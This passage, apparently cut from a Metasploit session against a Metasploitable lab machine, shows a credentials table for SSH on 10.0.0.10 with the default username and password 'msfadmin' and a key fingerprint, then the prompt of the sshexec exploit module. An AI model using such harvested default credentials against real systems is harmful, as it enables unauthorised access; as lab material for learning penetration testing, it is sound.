--   ----       ------     -------       ------    -------                                          -----  ------------  ----------  ----------------
585  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin                                                Password
586  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  6d:5d:df:2c:e6:5e:dd:a6:db:0d:84:4d:7d:bc:4a:19         SSH key

msf exploit(multi/ssh/sshexec) >
```